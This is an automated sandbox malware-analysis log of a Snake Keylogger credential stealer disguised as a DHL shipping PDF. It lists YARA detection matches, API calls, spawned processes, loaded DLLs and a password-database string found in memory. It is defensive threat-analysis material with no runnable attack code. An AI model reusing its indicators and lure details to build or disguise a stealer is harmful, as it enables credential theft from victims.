                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544ED703_2_0544ED70
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544C5203_2_0544C520
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544C5303_2_0544C530
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05440D3A3_2_05440D3A
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544CDD03_2_0544CDD0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054415EA3_2_054415EA
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544ED803_2_0544ED80
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05443C413_2_05443C41
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05443C503_2_05443C50
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544BC713_2_0544BC71
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544DC123_2_0544DC12
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544DC203_2_0544DC20
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544E4C03_2_0544E4C0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544E4D03_2_0544E4D0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544BC803_2_0544BC80
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544048A3_2_0544048A
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05449C903_2_05449C90
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054404983_2_05440498
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05442F483_2_05442F48
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544AF683_2_0544AF68
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544AF783_2_0544AF78
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05442F383_2_05442F38
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054437E83_2_054437E8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054437F83_2_054437F8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05449E183_2_05449E18
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544F6203_2_0544F620
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544F6303_2_0544F630
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544A6C83_2_0544A6C8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544D6823_2_0544D682
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544D6903_2_0544D690
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544A6B93_2_0544A6B9
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544C97A3_2_0544C97A
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544E91E3_2_0544E91E
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544E9283_2_0544E928
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544F1C83_2_0544F1C8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544F1D83_2_0544F1D8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544118F3_2_0544118F
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544C9883_2_0544C988
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054411A03_2_054411A0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054400403_2_05440040
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544E0683_2_0544E068
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544E0783_2_0544E078
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054400063_2_05440006
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544B8183_2_0544B818
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544B8283_2_0544B828
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544C0CA3_2_0544C0CA
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054408DF3_2_054408DF
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544C0D83_2_0544C0D8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054408F03_2_054408F0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054440983_2_05444098
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054440A83_2_054440A8
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05441B4A3_2_05441B4A
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544AB103_2_0544AB10
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544AB203_2_0544AB20
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544B3C13_2_0544B3C1
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544B3D03_2_0544B3D0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054433923_2_05443392
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_054433A03_2_054433A0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544A2613_2_0544A261
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544A2703_2_0544A270
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544FA783_2_0544FA78
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544D22A3_2_0544D22A
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544D2383_2_0544D238
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05442AE03_2_05442AE0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_05442AF03_2_05442AF0
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeCode function: 3_2_0544FA883_2_0544FA88
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2137131687.0000000008AB0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2124944282.0000000002B51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2124944282.0000000002B90000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000000.2110501835.0000000000846000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameNKUn.exe" vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2136107541.00000000055C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.2123309741.0000000000DFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4568835958.0000000000F87000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4568374575.000000000041A000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCloudServices.exe< vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeBinary or memory string: OriginalFilenameNKUn.exe" vs DHL Shipping Details Ref ID 446331798008765975594-pdf.exe
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 3.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2130367951.0000000003B59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000003.00000002.4568374575.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.2130367951.0000000003B91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6716, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 4552, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3b71398.3.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack, UltraSpeed.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3bf4418.2.raw.unpack, COVIDPickers.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, iZZiMmYtgNbupTaoiP.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, iZZiMmYtgNbupTaoiP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, SXeNjVTESUiPlIoGVN.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, SXeNjVTESUiPlIoGVN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.8ab0000.7.raw.unpack, SXeNjVTESUiPlIoGVN.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, SXeNjVTESUiPlIoGVN.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, SXeNjVTESUiPlIoGVN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, SXeNjVTESUiPlIoGVN.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, iZZiMmYtgNbupTaoiP.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d69d78.4.raw.unpack, iZZiMmYtgNbupTaoiP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, iZZiMmYtgNbupTaoiP.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, iZZiMmYtgNbupTaoiP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, SXeNjVTESUiPlIoGVN.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, SXeNjVTESUiPlIoGVN.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.3d0e958.5.raw.unpack, SXeNjVTESUiPlIoGVN.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/1@3/3
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.logJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeMutant created: NULL
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002FDD000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4572937327.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002FFE000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp, DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000003.00000002.4571874114.0000000002FCE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeVirustotal: Detection: 31%
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exeReversingLabs: Detection: 26%
                  Source: unknownProcess created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeProcess created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeSection loaded: amsi.dllJump to behavior
